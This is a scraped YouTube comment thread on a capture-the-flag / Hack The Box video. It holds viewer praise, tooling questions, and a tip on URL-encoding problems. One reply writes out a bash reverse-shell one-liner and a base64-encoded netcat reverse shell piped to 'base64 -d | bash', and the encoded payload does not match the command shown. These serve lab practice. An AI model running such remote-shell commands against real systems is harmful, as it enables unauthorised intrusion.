This is amazing educational content. It's very engaging to watch and gives broad exposure to many different techniques. What would also be amazing is if you follow this up with a "post mortem" where you explain the tools and techniques which were actually successful in a little more detail.
@@_CryptoCat I think it would work really well as just a narration over the top of this video - skipping to, playing and pausing after the important segments which allowed you to discover the next piece of information you needed in order to take the next step in what you were doing. At each of these pause points if you jump away from the video and into a terminal to briefly explain the tool/technique in question and show some very basic usage to explain how it was giving you the piece of information you needed to progress forward I think that would be really awesome and helpful. There are obviously a lot of different tools and techniques crammed into this video so I imagine you wouldn't want to go into crazy depth explaining each and every thing. A high level overview with basic usage would be great so that we can learn at a high level what the thing is, why we might want to use it and how to get started with it. A huge step in a lot of learning contexts is simply having an awareness that a tool exists and knowing the very basics of how to use it. From there, a student has a foothold to pursue deeper resources about said tool independently. Just my thoughts/suggestions. Sorry if it comes across as demanding 🙏. Great work. Keep it up =)
@@sockpastarock7082 That's a great idea! Explaining things as I go is definitely impacting my time so I might try and record a few games without any audio, then add narration afterwards and insert more video clips explaining tools/techniques as required. Thanks for the suggestions 😊
Exactly what I was thinking. This isn't for people who don't know what a reverse shell is, but for people who lack practical experience and want to see some rare vulnerabilities. I like seeing the approach with the different scans, then basically knocking at every door to see if something opens and stepping right in with a reverse shell. While I think I can follow most of it, sometimes a more detailed explanation would be very insightful, for example, why you did certain things in certain orders, why you even thought something was possible/impossible, or what some similar techniques would have been at certain points.
Thanks mate 🥰 I was gutted with the first one lmao. If I'd just saved myself 30 secs of time somewhere (I had plenty of opportunities), I would of got it!!
After watching your videos so much, even my English has improved. Before I needed to watch it with subtitles, today I no longer need it. Thank you for that.
Thank you, big fan of the content! If you don't mind my asking, what theme for parrot do you use? It looks really nice, but I couldn't find it anywhere.
Thanks mate! I just customised the palette in the terminal (terminator atm): imgur.com/a/gCnvq8A I would recommend making a new theme/profile so that you can easily swap between the default and your custom one (right click terminal). This is because some for tools the colour coding is important, e.g. linpeas.sh 🙂
To get root on the second box, it looks as if you are supposed to exploit the SETENV that was present in sudoers file… this can be done in a multitude of ways
The problem with the reverse shell, that when you add the command to the url doesn’t work but with burp it does 15:40, also happened in one of the htb starting point videos, for me it’s the same thing. Do you know why this is?
I think it's just a URL encoding issue but *sometimes* it works when I paste in the address bar, other times it doesn't. Not sure why that is 🤔 If you're not in a rush (although not doing it here probably cost me *more* time), it's a good idea to base64 encode the payload to prevent any such issues, e.g. echo -n 'bash -i >& /dev/tcp/10.10.14.32/31337 0>&1 &' | base64 cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTAuMTUuMTggMTMzNyA+L3RtcC9m | base64 -d | bash
![Web Challenges [Space Heroes CTF 2023]](http://i.ytimg.com/vi/d2BRicRLMfk/mqdefault.jpg)
This is amazing educational content. It's very engaging to watch and gives broad exposure to many different techniques.
What would also be amazing is if you follow this up with a "post mortem" where you explain the tools and techniques which were actually successful in a little more detail.
Thanks for the feedback 🙏 Post mortem breakdown is a great idea 🙂
@@_CryptoCat I think it would work really well as just a narration over the top of this video - skipping to, playing and pausing after the important segments which allowed you to discover the next piece of information you needed in order to take the next step in what you were doing. At each of these pause points if you jump away from the video and into a terminal to briefly explain the tool/technique in question and show some very basic usage to explain how it was giving you the piece of information you needed to progress forward I think that would be really awesome and helpful.
There are obviously a lot of different tools and techniques crammed into this video so I imagine you wouldn't want to go into crazy depth explaining each and every thing. A high level overview with basic usage would be great so that we can learn at a high level what the thing is, why we might want to use it and how to get started with it. A huge step in a lot of learning contexts is simply having an awareness that a tool exists and knowing the very basics of how to use it. From there, a student has a foothold to pursue deeper resources about said tool independently.
Just my thoughts/suggestions. Sorry if it comes across as demanding 🙏. Great work. Keep it up =)
@@sockpastarock7082 That's a great idea! Explaining things as I go is definitely impacting my time so I might try and record a few games without any audio, then add narration afterwards and insert more video clips explaining tools/techniques as required. Thanks for the suggestions 😊
Exactly what I was thinking. This isn't for people who don't know what a reverse shell is, but for people who lack practical experience and want to see some rare vulnerabilities. I like seeing the approach with the different scans, then basically knocking at every door to see if something opens and stepping right in with a reverse shell.
While I think I can follow most of it, sometimes a more detailed explanation would be very insightful, for example, why you did certain things in certain orders, why you even thought something was possible/impossible, or what some similar techniques would have been at certain points.
this channel is so underrated 19.7k subs should be 197k 🙂
awww thank you 😻
Unquestionably your tutorials are the most informative. I watch several videos on the same subjects and his are by far the best. Thanks
Awww thank you so much 💜
I know right Crypto for president. He explains the process really well.
Amazing content man! This first match was so close lol
Thanks mate 🥰 I was gutted with the first one lmao. If I'd just saved myself 30 secs of time somewhere (I had plenty of opportunities), I would of got it!!
Good job ! I'm not fast enough to get a first blood yet before the HTB wizards... so waiting for Cyber Apocalyse 2023 to begin 😁
Thanks! Same ffs lol 😆 Looking forward to cyber apocalypse as well 👀
Very nice video i must say , amazing content im learning so much !
Perfect! 🔥
Great stuff, dude! Thanks for sharing👍
Thanks mate! 💜
Really enjoyed the series my man😊
Awesome! 🙏
I really love this channel.
Oh my god. ❤
Thanks dude!
Thank you mate, appreciate it! 💜
After watching your videos so much, even my English has improved. Before I needed to watch it with subtitles, today I no longer need it.
Thank you for that.
@@gespacosmile haha I love that!! two birds, one stone 😉
@@_CryptoCat
Hahaha
Yeah!
Learning hacking and English. Awesome!
Thanks man. Peace from Brazil. 🤘🏻
Thank you, big fan of the content! If you don't mind my asking, what theme for parrot do you use? It looks really nice, but I couldn't find it anywhere.
Thanks mate! I just customised the palette in the terminal (terminator atm): imgur.com/a/gCnvq8A
I would recommend making a new theme/profile so that you can easily swap between the default and your custom one (right click terminal). This is because some for tools the colour coding is important, e.g. linpeas.sh 🙂
Great content, love your work :)
Thank you! 🙏🥰
To get root on the second box, it looks as if you are supposed to exploit the SETENV that was present in sudoers file… this can be done in a multitude of ways
Ah nice, thanks! I've noticed there's generally a few routes - good thing considering the 15 min time limit.
great
Let's goo
🔥🔥🔥
@@_CryptoCat I've already done only few machines after starting point so it's good to see how battlegrounds look like
@@casualcaspero I only tried it for the first time last month and I'm quite impressed. Great way to work on speed/efficiency 🙂
gg bro
The problem with the reverse shell, that when you add the command to the url doesn’t work but with burp it does 15:40, also happened in one of the htb starting point videos, for me it’s the same thing. Do you know why this is?
I think it's just a URL encoding issue but *sometimes* it works when I paste in the address bar, other times it doesn't. Not sure why that is 🤔
If you're not in a rush (although not doing it here probably cost me *more* time), it's a good idea to base64 encode the payload to prevent any such issues, e.g.
echo -n 'bash -i >& /dev/tcp/10.10.14.32/31337 0>&1 &' | base64
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTAuMTUuMTggMTMzNyA+L3RtcC9m | base64 -d | bash
@@_CryptoCat another useful thing to do is add spaces in ur reverse shell where needed to remove + and = from base64 to further prevent bad characters
Hi would you mind share what is in "plzsh" to catch a reverse shell connection? Thanks!!
Sure! You can find it here (along with my other commonly use aliases): github.com/Crypto-Cat/CTF/blob/main/my_bash_aliases.md
Damn amazing content, thanks for sharing
Thank you! 💜
Don’t forget to play with us next time 🥰
Of course! 💜